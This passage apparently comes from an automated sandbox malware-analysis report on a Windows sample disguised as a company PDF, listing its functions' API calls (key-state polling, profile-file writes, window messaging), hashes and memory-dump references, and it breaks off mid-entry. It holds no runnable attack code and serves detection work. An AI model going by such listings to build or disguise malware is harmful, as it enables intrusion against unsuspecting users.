                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 327935632-0
                                                                                                                      • Opcode ID: 2fa6e8c22776f257273f61f42dc8c98bb2c18f8045085979164469b3fef24e26
                                                                                                                      • Instruction ID: 5298be584c57eb96508ad3ba6e6b19dbc4bed1be9ff7c612d421183656d564fd
                                                                                                                      • Opcode Fuzzy Hash: 2fa6e8c22776f257273f61f42dc8c98bb2c18f8045085979164469b3fef24e26
                                                                                                                      • Instruction Fuzzy Hash: 5D511775A00609DFCB10EF68C898DADB7F4FF58310B14C0AAE916AB311DB79AD45CB91
                                                                                                                      Function 007BE7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 007BE88A
                                                                                                                      • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 007BE8B3
                                                                                                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 007BE8F2
                                                                                                                        • Part of subcall function 00759997: __itow.LIBCMT ref: 007599C2
                                                                                                                        • Part of subcall function 00759997: __swprintf.LIBCMT ref: 00759A0C
                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 007BE917
                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 007BE91F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1389676194-0
                                                                                                                      • Opcode ID: 7a76801f1945f4e685ddab627e19c8c2e1d8d2ad5aaf2e551e610541c9039c1b
                                                                                                                      • Instruction ID: 9baa7aa712e1f5ab50a2e96d7b297d6b92576b964b73e3dc509a0d5b046914ca
                                                                                                                      • Opcode Fuzzy Hash: 7a76801f1945f4e685ddab627e19c8c2e1d8d2ad5aaf2e551e610541c9039c1b
                                                                                                                      • Instruction Fuzzy Hash: 4A511A35A00209DFCF01EF64C985AADBBF5EF48315B188099E90AAB361CB75ED15CB51
                                                                                                                      Function 007DA2C5 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c8f5db0251ea08f79fa8c3ceb75750801907de4f34abcf92238544389cf34ce1
                                                                                                                      • Instruction ID: e21295da74353e62ddc0f395dc34b9d2d71e3159bd0d918c1441d9727716c229
                                                                                                                      • Opcode Fuzzy Hash: c8f5db0251ea08f79fa8c3ceb75750801907de4f34abcf92238544389cf34ce1
                                                                                                                      • Instruction Fuzzy Hash: 4241D335901144BFC710DB28CC48FA9BBBAFB09310F194266F856A73E1D778AE51DA61
                                                                                                                      Function 00752344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetCursorPos.USER32(?), ref: 00752357
                                                                                                                      • ScreenToClient.USER32(008167B0,?), ref: 00752374
                                                                                                                      • GetAsyncKeyState.USER32(00000001), ref: 00752399
                                                                                                                      • GetAsyncKeyState.USER32(00000002), ref: 007523A7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AsyncState$ClientCursorScreen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4210589936-0
                                                                                                                      • Opcode ID: 8e6dcbd9db607256147e83c22cad744282a79491491ea5013d05ad943d67ed58
                                                                                                                      • Instruction ID: 2613066543cfb9554d06db7bad243e8bd2c11c416693ee502b5979184d694890
                                                                                                                      • Opcode Fuzzy Hash: 8e6dcbd9db607256147e83c22cad744282a79491491ea5013d05ad943d67ed58
                                                                                                                      • Instruction Fuzzy Hash: AC418F31504119FBDF169F68C848AE9BB74FB06321F20436AF929922A1C7789D58DFA1
                                                                                                                      Function 007A6920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007A695D
                                                                                                                      • TranslateAcceleratorW.USER32(?,?,?), ref: 007A69A9
                                                                                                                      • TranslateMessage.USER32(?), ref: 007A69D2
                                                                                                                      • DispatchMessageW.USER32(?), ref: 007A69DC
                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007A69EB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2108273632-0
                                                                                                                      • Opcode ID: fe1838ec772c73f711505edec85ef1510210a55d4ac30ce646982a2c637b41d7
                                                                                                                      • Instruction ID: 48a7775469d26e9c6de02f562c0b0df1d5147b81c5a8fa385db5c6b07cd902ce
                                                                                                                      • Opcode Fuzzy Hash: fe1838ec772c73f711505edec85ef1510210a55d4ac30ce646982a2c637b41d7
                                                                                                                      • Instruction Fuzzy Hash: E731C271900246AADB208F749C48BF77BACBF43304F18C769E462D20A1E739E899D790
                                                                                                                      Function 007A8F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 007A8F12
                                                                                                                      • PostMessageW.USER32(?,00000201,00000001), ref: 007A8FBC
                                                                                                                      • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 007A8FC4
                                                                                                                      • PostMessageW.USER32(?,00000202,00000000), ref: 007A8FD2
                                                                                                                      • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 007A8FDA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostSleep$RectWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3382505437-0
                                                                                                                      • Opcode ID: 578fc7e1048e0022a4909809315b610002f3026e4e340cf0d72d9b58489796de
                                                                                                                      • Instruction ID: c390d3158692a353bf5aeaff9da5451fe0bf9ba1aaf151b0c862c60e3f74b19a
                                                                                                                      • Opcode Fuzzy Hash: 578fc7e1048e0022a4909809315b610002f3026e4e340cf0d72d9b58489796de
                                                                                                                      • Instruction Fuzzy Hash: 8E31E07150021AEFDF00CF68D94CA9E7BB6FB45315F10822AF925EA2D0C7B89910CB91
                                                                                                                      Function 007AB6AF Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • IsWindowVisible.USER32(?), ref: 007AB6C7
                                                                                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 007AB6E4
                                                                                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 007AB71C
                                                                                                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 007AB742
                                                                                                                      • _wcsstr.LIBCMT ref: 007AB74C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3902887630-0
                                                                                                                      • Opcode ID: 222a8fdfa653b824d5d6164b663e2f77b6f8f3ef94667e38007edd01085df0b0
                                                                                                                      • Instruction ID: 0e137467bfcb212486eda73b8f0f5f3b96fe6b03f3023b01a4c9a5f72b5a980c
                                                                                                                      • Opcode Fuzzy Hash: 222a8fdfa653b824d5d6164b663e2f77b6f8f3ef94667e38007edd01085df0b0
                                                                                                                      • Instruction Fuzzy Hash: F221FC31205204FBEB155B399C49E7B7BA8DF8A750F00813AFC09CA1A2EFA9DC409750
                                                                                                                      Function 007DB405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 007DB44C
                                                                                                                      • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 007DB471
                                                                                                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 007DB489
                                                                                                                      • GetSystemMetrics.USER32(00000004), ref: 007DB4B2
                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,007C1184,00000000), ref: 007DB4D0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Long$MetricsSystem
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2294984445-0
                                                                                                                      • Opcode ID: 303b8e7df0e91bf1ea4fef2973a347a974e98cd071402d4d37792f97ba719ae7
                                                                                                                      • Instruction ID: ce64183522481371679227ed7d2cb30083d85ea53f82f6094201bd9d98635a2a
                                                                                                                      • Opcode Fuzzy Hash: 303b8e7df0e91bf1ea4fef2973a347a974e98cd071402d4d37792f97ba719ae7
                                                                                                                      • Instruction Fuzzy Hash: 16217171610295EFCB10DF389C04A6A37B4FB05721F16873AF966D62E1E7349821DB90
                                                                                                                      Function 007A97E9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 007A9802
                                                                                                                        • Part of subcall function 00757D2C: _memmove.LIBCMT ref: 00757D66
                                                                                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 007A9834
                                                                                                                      • __itow.LIBCMT ref: 007A984C
                                                                                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 007A9874
                                                                                                                      • __itow.LIBCMT ref: 007A9885
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$__itow$_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2983881199-0
                                                                                                                      • Opcode ID: c6ce652eaa56046bbf09cb09fef7ad6841c2ba385f490adfafa6a04f2f28f015
                                                                                                                      • Instruction ID: b9672a5e091d15f4c1fde5e1bf261297fd07c1ef437a501b88e54dbfb3993e14
                                                                                                                      • Opcode Fuzzy Hash: c6ce652eaa56046bbf09cb09fef7ad6841c2ba385f490adfafa6a04f2f28f015
                                                                                                                      • Instruction Fuzzy Hash: D021F531B01208EBDB109A659C8AEEE3BB8EF8AB11F044025FE05DB281D67C8D55D7D2
                                                                                                                      Function 007512F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0075134D
                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0075135C
                                                                                                                      • BeginPath.GDI32(?), ref: 00751373
                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0075139C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3225163088-0
                                                                                                                      • Opcode ID: 1227f8c00d89740d9168d98f7d466f6fd35d1a3e76b5478eb7b14b4df33862fe
                                                                                                                      • Instruction ID: 4ed28b97b76e7a13d2c184f092a6f4ee1e91bd0e1fcb3e152eb123a7500e1eef
                                                                                                                      • Opcode Fuzzy Hash: 1227f8c00d89740d9168d98f7d466f6fd35d1a3e76b5478eb7b14b4df33862fe
                                                                                                                      • Instruction Fuzzy Hash: E8213D70801208EFDB119F29EC087E97BBDFB00323F54C236F851965A0E7B999A5DB90
                                                                                                                      Function 007AC161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memcmp
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2931989736-0
                                                                                                                      • Opcode ID: 839f81c2acb095bf305f0f473c08d2b838dfb5ceec0261b523f69cdf7a5b89fe
                                                                                                                      • Instruction ID: d3b1bb3cdd719f0facd5922c27054841b5851c2ef731d4699eef1fd237a1f7af
                                                                                                                      • Opcode Fuzzy Hash: 839f81c2acb095bf305f0f473c08d2b838dfb5ceec0261b523f69cdf7a5b89fe
                                                                                                                      • Instruction Fuzzy Hash: 0501D6F170520DBBD605AA25CD46E6B639D9BA6394B448110FD04D6243EE5CAE11C3A1
                                                                                                                      Function 007B4D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 007B4D5C
                                                                                                                      • __beginthreadex.LIBCMT ref: 007B4D7A
                                                                                                                      • MessageBoxW.USER32(?,?,?,?), ref: 007B4D8F
                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 007B4DA5
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 007B4DAC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3824534824-0
                                                                                                                      • Opcode ID: 3a919c1ac0fcb54d9999d27786901a8ba616c0c74082f8714aa547693b2bbf84
                                                                                                                      • Instruction ID: dcd40a493acf34f8ca65b149b854d04eb51835321ebd93f1eb8c68515f4aaf37
                                                                                                                      • Opcode Fuzzy Hash: 3a919c1ac0fcb54d9999d27786901a8ba616c0c74082f8714aa547693b2bbf84
                                                                                                                      • Instruction Fuzzy Hash: 601108B2A05208BFC7119BA8DC08BEA7FACFF45320F188266F955D3251D6798D0087A1
                                                                                                                      Function 007A874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 007A8766
                                                                                                                      • GetLastError.KERNEL32(?,007A822A,?,?,?), ref: 007A8770
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,007A822A,?,?,?), ref: 007A877F
                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,007A822A,?,?,?), ref: 007A8786
                                                                                                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 007A879D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 842720411-0
                                                                                                                      • Opcode ID: b1b23c8b84d4aabcd2372918aa69ffd44ebc693a37a32c2e204188b90ab6fbfd
                                                                                                                      • Instruction ID: 9008e9ea7edbc7f41aa2993f201c3ddb79e67e4b3c70861dcab94b976bd8bcc9
                                                                                                                      • Opcode Fuzzy Hash: b1b23c8b84d4aabcd2372918aa69ffd44ebc693a37a32c2e204188b90ab6fbfd
                                                                                                                      • Instruction Fuzzy Hash: 70011271601204FFDB105FA5DC48D67BF7DFF86755720457AF84AC6160DA359D00CA61
                                                                                                                      Function 007B54E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007B5502
                                                                                                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 007B5510
                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 007B5518
                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 007B5522
                                                                                                                      • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007B555E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2833360925-0
                                                                                                                      • Opcode ID: 05c265378fd5870b7b9e58fae65d383626ef1f94cbed2c8a30a7a3354f5e7eb6
                                                                                                                      • Instruction ID: 4bc73bc5d148a7e638ae45a998cd98605161da5ddc25f8c79da3733e182064aa
                                                                                                                      • Opcode Fuzzy Hash: 05c265378fd5870b7b9e58fae65d383626ef1f94cbed2c8a30a7a3354f5e7eb6
                                                                                                                      • Instruction Fuzzy Hash: 71013971D01A1DDBCF10EFE8E8487EDBB79BF09712F004156E802B2140DB395560C7A5
                                                                                                                      Function 007A7652 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A758C,80070057,?,?,?,007A799D), ref: 007A766F
                                                                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A758C,80070057,?,?), ref: 007A768A
